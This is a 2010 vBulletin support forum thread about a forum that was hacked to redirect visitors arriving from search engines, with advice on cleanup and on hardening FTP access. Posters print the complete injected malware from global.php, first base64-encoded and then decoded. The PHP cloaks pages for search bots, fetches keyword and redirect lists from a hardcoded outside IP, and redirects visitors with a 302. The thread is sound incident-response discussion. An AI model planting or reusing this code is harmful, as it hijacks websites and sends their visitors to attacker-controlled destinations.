Forum hijacked/redirected - URGENT PLEASE HELP

**BBR-APBT** · Tue 2 Feb '10, 5:48am

You have some sort or redirect in your php files if the referrer is google.

This is done via your ads or directly in your code.

**madkeen** · Tue 2 Feb '10, 5:49am

YEs, I know that but where in the code and how do I fix it.
What do I look for, etc, etc, etc

**Trevor Hannant** · Tue 2 Feb '10, 5:58am

What version of vBulletin are you running? First step is to upload all the original vBulletin files to your server overwriting what's already there. If it's not the latest that is available under your license, then you should consider upgrading at this point also.

Do you have modifications/plugins installed? Are they the most up to date?

Check for amended templates - did you make the amendments? Create a new style and choose no parent style. This will force it to use the default templates. Finally empty your browser cache, close all browser windows then try again. Make sure you change to the new style and view your forums with it.

Do you have the same problem?

**BBR-APBT** · Tue 2 Feb '10, 6:02am

Check in your htaccess file. Seems as this happened to a few sites.
Thats where the redirect is I believe.

How ever someone had access to your hosting account to edit that file.

It is safe to say you have been compromised.

Rename your .htaccess file .htaccess.compromised and create a new .htaccess file without the exploit code. This is only a temporary fix, as these hacks often include backdoors and viruses that will try to restore the bad .htaccess file.

You will have to re-upload all your files from a backup. As Trevor said Check for amended templates - did you make the amendments?

**madkeen** · Tue 2 Feb '10, 1:47pm

Thanks for your help

Found several .htaccess files in various directories

in global.php or index.php there is a php code that makes this redirection. It's something like this:

eval(base64_decode(SDHFUFH343BJB3TB3TJ3B34...

deleted that and is working fine again.

**BBR-APBT** · Tue 2 Feb '10, 2:12pm

Originally posted by madkeen

Thanks for your help

Found several .htaccess files in various directories

in global.php or index.php there is a php code that makes this redirection. It's something like this:

eval(base64_decode(SDHFUFH343BJB3TB3TJ3B34...

deleted that and is working fine again.

You need to reinstall all your code and check your templates. You was hacked and you did not correctly fix the problem. You need to find the hole and fix it. Read my post again and follow the directions.

**madkeen** · Tue 2 Feb '10, 9:04pm

No templates amended.

Deleted the .htaccess files and replaced with originals.

Will dig further but appears nothing else was changed.

Appears that someone that logged in via ftp to upload files had spyware or similar on their system.

**motowebmaster** · Wed 3 Feb '10, 8:08pm

If you run your own server, install a firewall and restrict FTP so that only your network (IP Address) can use it. It is best that FTP be blocked completely, and that you use SFTP instead (and have it restricted at your firewall as well).

**madkeen** · Fri 5 Feb '10, 12:39am

Here is a copy of the exact code that was in Global.php

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOyRodD0kX1NFUlZFUlsnSFRUUF9IT1NUJ107JHB0cz1leH Bsb2RlKCI/IiwkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7JHB0PSRwdHNbMF07JHB4PSRwdHNbMV07JGhpPSRfU0VSVkVSWydTRV JWRVJfQUREUiddOyRoaT1zdHJfcmVwbGFjZSgnLicsJycsJGhpKS4iPSI7JGE9JF9TRVJWRVJbJ0hUVFBfVVNFUl9B R0VOVCddO2lmKGVyZWdpKCJnb29nbGUiLCRhKXx8ZXJlZ2koIkdvb2dsZWJvdCIsJGEpfHxlcmVnaSgic2x1cnAiLC RhKXx8ZXJlZ2koIm1zbmJvdCIsJGEpKXskZDE9IjIxMi4xMTcuMTY5LjEzOSI7JGYxPSIvYWxsbXlrZXkudHh0Ijsk ZnAxPWZzb2Nrb3BlbigkZDEsODAsJGVybm8sJGVyc3RyLDMwKTtpZighJGZwMSl7cHJpbnQgIkVycjogJGVyc3RyIF skZXJub10iO31lbHNle2Z3cml0ZSgkZnAxLCJHRVQgJGYxIEhUVFAvMS4wXHJcbiIpO2Z3cml0ZSgkZnAxLCJIb3N0 OiAkZDFcclxuXHJcbiIpO3doaWxlKCFmZW9mKCRmcDEpKXskaDEuPWZyZWFkKCRmcDEsNTEyKTt9ZmNsb3NlKCRmcD EpO31wcmVnX21hdGNoX2FsbCgiITxiZWdpbj4oW148XSspPGVuZD4hIiwkaDEsJG0xKTtpZihlcmVnaSgkaGksJHB4 KSl7JGs9c3RyX3JlcGxhY2UoJGhpLCcnLCRweCk7ZWNobyAiPEhUTUw+PEhFQUQ+PFRJVExFPiIuc3RyX3JlcGxhY2 UoJy0nLCcgJyxzdHJ0b3VwcGVyKCRrKSkuIjwvVElUTEU+PE1FVEEgaHR0cC1lcXVpdj1Db250ZW50LVR5cGUgY29u dGVudD1cInRleHQvaHRtbDsgY2hhcnNldD11dGYtOFwiPjxNRVRBIGNvbnRlbnQ9XCJpbmRleCxmb2xsb3dcIiBuYW 1lPVJPQk9UUz48TUVUQSBodHRwLWVxdWl2PVwiQ29udGVudC1MYW5ndWFnZVwiIGNvbnRlbnQ9XCJlblwiPjxNRVRB IGh0dHAtZXF1aXY9XCJyZWZyZXNoXCIgY29udGVudD1cIjEwXCI+PC9IRUFEPjxCT0RZPjxIMT4iLnN0cl9yZXBsYW NlKCctJywnICcsJGspLiI6PC9IMT48QlI+PEI+Ijtmb3IoJGk9MDskaTxjb3VudCgkbTFbMF0pOyRpKyspe2VjaG8g JG0xWzFdWyRpXTt9ZWNobyAiPC9CPjxCUj4iO2ZvcigkaT0wOyRpPGNvdW50KCRtMVswXSk7JGkrKyl7ZWNobyAiPE EgSFJFRj0naHR0cDovLyIuJGh0LiRwdC4iPyIuJGhpLiRtMVsxXVskaV0uIic+Ii5zdHJfcmVwbGFjZSgnLScsJyAn LCRtMVsxXVskaV0pLiI8L0E+PEJSPiI7fWVjaG8gIjxJPiI7Zm9yKCRpPTA7JGk8Y291bnQoJG0xWzBdKTskaSsrKX tlY2hvIHN0cl9yZXBsYWNlKCctJywnJywkbTFbMV1bJGldKTt9ZWNobyAiPC9JPjwvQk9EWT48L0hUTUw+IjtleGl0 KCk7fSRrcz0kbTFbMV1bcmFuZCgwLGNvdW50KCRtMVswXSkpXTskdXM9Imh0dHA6Ly8iLiRodC4kcHQuIj8iLiRoaS 4ka3M7ZWNobyAiPEhUTUw+PEhFQUQ+PFRJVExFPjwvVElUTEU+PE1FVEEgaHR0cC1lcXVpdj1Db250ZW50LVR5cGUg Y29udGVudD1cInRleHQvaHRtbDsgY2hhcnNldD11dGYtOFwiPjxNRVRBIGNvbnRlbnQ9XCJpbmRleCxmb2xsb3dcIi BuYW1lPVJPQk9UUz48TUVUQSBodHRwLWVxdWl2PVwiQ29udGVudC1MYW5ndWFnZVwiIGNvbnRlbnQ9XCJlblwiPjxN RVRBIGh0dHAtZXF1aXY9XCJyZWZyZXNoXCIgY29udGVudD1cIjA7dXJsPSR1c1wiPjwvSEVBRD48Qk9EWT48L0JPRF k+PC9IVE1MPiI7ZXhpdCgpO30kcmE9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddO2lmKGVyZWdpKCJnb29nbGUuIiwk cmEpfHxlcmVnaSgieWFob28uIiwkcmEpfHxlcmVnaSgibGl2ZS4iLCRyYSl8fGVyZWdpKCJtc24uIiwkcmEpfHxlcm VnaSgiYmluZy4iLCRyYSkpeyRkMj0iMjEyLjExNy4xNjkuMTM5IjskZjI9Ii9yZWQudHh0IjskZnAyPWZzb2Nrb3Bl bigkZDIsODAsJGVybm8sJGVyc3RyLDMwKTtpZighJGZwMil7cHJpbnQgIkVycjogJGVyc3RyIFskZXJub10iO31lbH Nle2Z3cml0ZSgkZnAyLCJHRVQgJGYyIEhUVFAvMS4wXHJcbiIpO2Z3cml0ZSgkZnAyLCJIb3N0OiAkZDJcclxuXHJc biIpO3doaWxlKCFmZW9mKCRmcDIpKXskaDIuPWZyZWFkKCRmcDIsNTEyKTt9ZmNsb3NlKCRmcDIpO31wcmVnX21hdG NoX2FsbCgiITxiZWdpbj4oW148XSspPGVuZD4hIiwkaDIsJG0yKTskcj0kbTJbMV1bYXJyYXlfcmFuZCgkbTIpXTsk cj0kci4iPyIuJHJhO2hlYWRlcigiSFRUUC8xLjEgMzAyIik7aGVhZGVyKCJMb2NhdGlvbjogJHIiKTtleGl0KCk7fQ =='));

**BBR-APBT** · Fri 5 Feb '10, 4:28am

and here is that PHP code that was inserted.

Code:

error_reporting(0);$ht=$_SERVER['HTTP_HOST'];$pts=explode("?",$_SERVER['REQUEST_URI']);$pt=$pts[0];$px=$pts[1];$hi=$_SERVER['SERVER_ADDR'];$hi=str_replace('.','',$hi)."=";$a=$_SERVER['HTTP_USER_AGENT'];if(eregi("google",$a)||eregi("Googlebot",$a)||eregi("slurp",$a)||eregi("msnbot",$a)){$d1="212.117.169.139";$f1="/allmykey.txt";$fp1=fsockopen($d1,80,$erno,$erstr,30);if(!$fp1){print "Err: $erstr [$erno]";}else{fwrite($fp1,"GET $f1 HTTP/1.0\r\n");fwrite($fp1,"Host: $d1\r\n\r\n");while(!feof($fp1)){$h1.=fread($fp1,512);}fclose($fp1);}preg_match_all("!<begin>([^<]+)<end>!",$h1,$m1);if(eregi($hi,$px)){$k=str_replace($hi,'',$px);echo "<HTML><HEAD><TITLE>".str_replace('-',' ',strtoupper($k))."</TITLE><META http-equiv=Content-Type content=\"text/html; charset=utf-8\"><META content=\"index,follow\" name=ROBOTS><META http-equiv=\"Content-Language\" content=\"en\"><META http-equiv=\"refresh\" content=\"10\"></HEAD><BODY><H1>".str_replace('-',' ',$k).":</H1><BR><B>";for($i=0;$i<count($m1[0]);$i++){echo $m1[1][$i];}echo "</B><BR>";for($i=0;$i<count($m1[0]);$i++){echo "<A HREF='http://".$ht.$pt."?".$hi.$m1[1][$i]."'>".str_replace('-',' ',$m1[1][$i])."</A><BR>";}echo "<I>";for($i=0;$i<count($m1[0]);$i++){echo str_replace('-','',$m1[1][$i]);}echo "</I></BODY></HTML>";exit();}$ks=$m1[1][rand(0,count($m1[0]))];$us="http://".$ht.$pt."?".$hi.$ks;echo "<HTML><HEAD><TITLE></TITLE><META http-equiv=Content-Type content=\"text/html; charset=utf-8\"><META content=\"index,follow\" name=ROBOTS><META http-equiv=\"Content-Language\" content=\"en\"><META http-equiv=\"refresh\" content=\"0;url=$us\"></HEAD><BODY></BODY></HTML>";exit();}$ra=$_SERVER['HTTP_REFERER'];if(eregi("google.",$ra)||eregi("yahoo.",$ra)||eregi("live.",$ra)||eregi("msn.",$ra)||eregi("bing.",$ra)){$d2="212.117.169.139";$f2="/red.txt";$fp2=fsockopen($d2,80,$erno,$erstr,30);if(!$fp2){print "Err: $erstr [$erno]";}else{fwrite($fp2,"GET $f2 HTTP/1.0\r\n");fwrite($fp2,"Host: $d2\r\n\r\n");while(!feof($fp2)){$h2.=fread($fp2,512);}fclose($fp2);}preg_match_all("!<begin>([^<]+)<end>!",$h2,$m2);$r=$m2[1][array_rand($m2)];$r=$r."?".$ra;header("HTTP/1.1 302");header("Location: $r");exit();}

**GCC LLC** · Wed 3 Mar '10, 5:10am

Hey guys, this happened to me as well and the base64_decode stuff was inserted inside of my database in either one of the plugins (once it was inserted inside of VBSEO in vbseo_start) and the last time it seemed to just be inserted inside of the datastore table. It's easy to remove at this point and I have an alert set up to tell me when it's happened but we really need to figure out if it's VB that's allowing this or one of the plugins. Are either of you running the vB blog software? I'm trying to narrow it down based on some things I've seen in my server logs. Let's work together and figure this thing out!

vBulletin 3 End of Life

Forum hijacked/redirected - URGENT PLEASE HELP

Forum hijacked/redirected - URGENT PLEASE HELP

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment